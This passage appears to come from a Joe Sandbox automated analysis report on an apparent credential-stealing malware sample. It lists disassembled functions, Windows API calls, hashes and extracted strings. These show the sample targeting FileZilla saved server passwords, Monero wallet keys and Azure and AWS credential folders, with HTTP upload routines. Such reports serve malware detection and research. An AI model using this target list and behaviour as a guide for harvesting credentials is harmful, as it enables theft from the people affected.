                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: f3116e5c8695dd53665b31b3e8510350e72040893dd3854d15a19aa1c54edc22
                              • Instruction ID: 08ae1e4de1ac99f5262241dd893bbbffbf661f28d4e7f72a68360b596706b92d
                              • Opcode Fuzzy Hash: f3116e5c8695dd53665b31b3e8510350e72040893dd3854d15a19aa1c54edc22
                              • Instruction Fuzzy Hash: 84D11071900208ABDB08EBF8DD96EEE7778FF24700F544518F112E6291DF74AA46CB62
                              Function 008A5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6
                                • Part of subcall function 008A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 008A4839
                                • Part of subcall function 008A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 008A4849
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008A59F8
                              • StrCmpCA.SHLWAPI(?,0142F028), ref: 008A5A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008A5B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0142F098,00000000,?,01429CE8,00000000,?,008C1A1C), ref: 008A5E71
                              • lstrlen.KERNEL32(00000000), ref: 008A5E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 008A5E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008A5E9A
                              • lstrlen.KERNEL32(00000000), ref: 008A5EAF
                              • lstrlen.KERNEL32(00000000), ref: 008A5ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 008A5EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 008A5F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 008A5F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 008A5F4C
                              • InternetCloseHandle.WININET(00000000), ref: 008A5FB0
                              • InternetCloseHandle.WININET(00000000), ref: 008A5FBD
                              • HttpOpenRequestA.WININET(00000000,0142F038,?,0142EB78,00000000,00000000,00400100,00000000), ref: 008A5BF8
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                                • Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
                                • Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982
                              • InternetCloseHandle.WININET(00000000), ref: 008A5FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: 522aa51892b073468585083d2333105e5de20b1091bfe9f494b4e5bb691e5b8a
                              • Instruction ID: 9742a5b78a02ebb763496a27bb2fbcbcb5b14872c52cbb84525f26bf637a8e46
                              • Opcode Fuzzy Hash: 522aa51892b073468585083d2333105e5de20b1091bfe9f494b4e5bb691e5b8a
                              • Instruction Fuzzy Hash: F9121171820118BADB19EBA4DCD5FEEB378FF14700F404169B106E66A1DF706A4ACF66
                              Function 008ACEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                                • Part of subcall function 008B8B60: GetSystemTime.KERNEL32(008C0E1A,01429D18,008C05AE,?,?,008A13F9,?,0000001A,008C0E1A,00000000,?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008B8B86
                                • Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
                                • Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008ACF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 008AD0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008AD0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 008AD208
                              • lstrcat.KERNEL32(?,008C1478), ref: 008AD217
                              • lstrcat.KERNEL32(?,00000000), ref: 008AD22A
                              • lstrcat.KERNEL32(?,008C147C), ref: 008AD239
                              • lstrcat.KERNEL32(?,00000000), ref: 008AD24C
                              • lstrcat.KERNEL32(?,008C1480), ref: 008AD25B
                              • lstrcat.KERNEL32(?,00000000), ref: 008AD26E
                              • lstrcat.KERNEL32(?,008C1484), ref: 008AD27D
                              • lstrcat.KERNEL32(?,00000000), ref: 008AD290
                              • lstrcat.KERNEL32(?,008C1488), ref: 008AD29F
                              • lstrcat.KERNEL32(?,00000000), ref: 008AD2B2
                              • lstrcat.KERNEL32(?,008C148C), ref: 008AD2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 008AD2D4
                              • lstrcat.KERNEL32(?,008C1490), ref: 008AD2E3
                                • Part of subcall function 008BA820: lstrlen.KERNEL32(008A4F05,?,?,008A4F05,008C0DDE), ref: 008BA82B
                                • Part of subcall function 008BA820: lstrcpy.KERNEL32(008C0DDE,00000000), ref: 008BA885
                              • lstrlen.KERNEL32(?), ref: 008AD32A
                              • lstrlen.KERNEL32(?), ref: 008AD339
                                • Part of subcall function 008BAA70: StrCmpCA.SHLWAPI(01428860,008AA7A7,?,008AA7A7,01428860), ref: 008BAA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 008AD3B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: 1352239cc9a3187aa0fced0052b8b40b848d8d7e9e01c49086595dd64260357d
                              • Instruction ID: fa1db374250c84be8f5af2f9c57768b2393c53991daffbfc632dff96394f2425
                              • Opcode Fuzzy Hash: 1352239cc9a3187aa0fced0052b8b40b848d8d7e9e01c49086595dd64260357d
                              • Instruction Fuzzy Hash: 4EE1FA71910108ABDB18EBA4DD96EEE7778FF24301F104168F106F66A1DE35AA06CB67
                              Function 008AC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
                                • Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0142C7B8,00000000,?,008C144C,00000000,?,?), ref: 008ACA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 008ACA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 008ACA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 008ACAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 008ACAD9
                              • StrStrA.SHLWAPI(?,0142C860,008C0B52), ref: 008ACAF7
                              • StrStrA.SHLWAPI(00000000,0142C788), ref: 008ACB1E
                              • StrStrA.SHLWAPI(?,0142D210,00000000,?,008C1458,00000000,?,00000000,00000000,?,014286E0,00000000,?,008C1454,00000000,?), ref: 008ACCA2
                              • StrStrA.SHLWAPI(00000000,0142D190), ref: 008ACCB9
                                • Part of subcall function 008AC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 008AC871
                                • Part of subcall function 008AC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 008AC87C
                              • StrStrA.SHLWAPI(?,0142D190,00000000,?,008C145C,00000000,?,00000000,01428720), ref: 008ACD5A
                              • StrStrA.SHLWAPI(00000000,01428880), ref: 008ACD71
                                • Part of subcall function 008AC820: lstrcat.KERNEL32(?,008C0B46), ref: 008AC943
                                • Part of subcall function 008AC820: lstrcat.KERNEL32(?,008C0B47), ref: 008AC957
                                • Part of subcall function 008AC820: lstrcat.KERNEL32(?,008C0B4E), ref: 008AC978
                              • lstrlen.KERNEL32(00000000), ref: 008ACE44
                              • CloseHandle.KERNEL32(00000000), ref: 008ACE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: 99ba3bb1670f25c514c0625b78c9a2c88d666ec910bf2e5607bbdfc0d1a1bbb2
                              • Instruction ID: 650d41e3d8523f4109dc85a9bd3b07b63ae71ab2bb752681fe7c224bea7520fa
                              • Opcode Fuzzy Hash: 99ba3bb1670f25c514c0625b78c9a2c88d666ec910bf2e5607bbdfc0d1a1bbb2
                              • Instruction Fuzzy Hash: F5E1ED71900108BBDB18EBA8DC95FEEB778FF14300F404169F516E6691EF346A4ACB66
                              Function 008B8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                              • RegOpenKeyExA.ADVAPI32(00000000,0142A838,00000000,00020019,00000000,008C05B6), ref: 008B83A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 008B8426
                              • wsprintfA.USER32 ref: 008B8459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 008B847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 008B848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 008B8499
                                • Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: f6ac9dbb0f733910f3b43bed21afe7258cdfe4d60ef6bbf5472af3785708aaa8
                              • Instruction ID: 278e2d59452c7798698de0d7337d4ee25a838119ba183b946a2491dc89487728
                              • Opcode Fuzzy Hash: f6ac9dbb0f733910f3b43bed21afe7258cdfe4d60ef6bbf5472af3785708aaa8
                              • Instruction Fuzzy Hash: D981FC71910118ABDB28DB54CC95FEAB7B8FF18700F008299E10AE6250DF756B86CFA5
                              Function 008B4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008B8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 008B4DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 008B4DCD
                                • Part of subcall function 008B4910: wsprintfA.USER32 ref: 008B492C
                                • Part of subcall function 008B4910: FindFirstFileA.KERNEL32(?,?), ref: 008B4943
                              • lstrcat.KERNEL32(?,00000000), ref: 008B4E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 008B4E59
                                • Part of subcall function 008B4910: StrCmpCA.SHLWAPI(?,008C0FDC), ref: 008B4971
                                • Part of subcall function 008B4910: StrCmpCA.SHLWAPI(?,008C0FE0), ref: 008B4987
                                • Part of subcall function 008B4910: FindNextFileA.KERNEL32(000000FF,?), ref: 008B4B7D
                                • Part of subcall function 008B4910: FindClose.KERNEL32(000000FF), ref: 008B4B92
                              • lstrcat.KERNEL32(?,00000000), ref: 008B4EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 008B4EE5
                                • Part of subcall function 008B4910: wsprintfA.USER32 ref: 008B49B0
                                • Part of subcall function 008B4910: StrCmpCA.SHLWAPI(?,008C08D2), ref: 008B49C5
                                • Part of subcall function 008B4910: wsprintfA.USER32 ref: 008B49E2
                                • Part of subcall function 008B4910: PathMatchSpecA.SHLWAPI(?,?), ref: 008B4A1E
                                • Part of subcall function 008B4910: lstrcat.KERNEL32(?,0142F0D8), ref: 008B4A4A
                                • Part of subcall function 008B4910: lstrcat.KERNEL32(?,008C0FF8), ref: 008B4A5C
                                • Part of subcall function 008B4910: lstrcat.KERNEL32(?,?), ref: 008B4A70
                                • Part of subcall function 008B4910: lstrcat.KERNEL32(?,008C0FFC), ref: 008B4A82
                                • Part of subcall function 008B4910: lstrcat.KERNEL32(?,?), ref: 008B4A96
                                • Part of subcall function 008B4910: CopyFileA.KERNEL32(?,?,00000001), ref: 008B4AAC
                                • Part of subcall function 008B4910: DeleteFileA.KERNEL32(?), ref: 008B4B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: 8b89cc8e2dbd4608c7ca2f1e38955467056c78fa6b7f9f9b9841f43233a41b48
                              • Instruction ID: 3fd4e5d104a15de876efc7a6fad32f3806ad9c38c72c05dc933965d9c578a9b3
                              • Opcode Fuzzy Hash: 8b89cc8e2dbd4608c7ca2f1e38955467056c78fa6b7f9f9b9841f43233a41b48
                              • Instruction Fuzzy Hash: 5741837A94020467DB64F770DC8BFDD7238FB25700F004458B695E62C2EEB49B898B93
                              Function 008B9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                              Download Yara Rule
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 008B906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: 095532a67d3eb889c82fbf6dcb398538547a4339dcd07dd664e9ead6289558cf
                              • Instruction ID: 58b71472f9a55c09612168f866852746ebb6584857d7da558bdaa89e2d1ac333
                              • Opcode Fuzzy Hash: 095532a67d3eb889c82fbf6dcb398538547a4339dcd07dd664e9ead6289558cf
                              • Instruction Fuzzy Hash: 1271BAB5910208ABDB04EFE4DC89FEEB7B9FB58700F108518F615EB290DB34A945CB61
                              Function 008B2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 008B31C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 008B335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 008B34EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
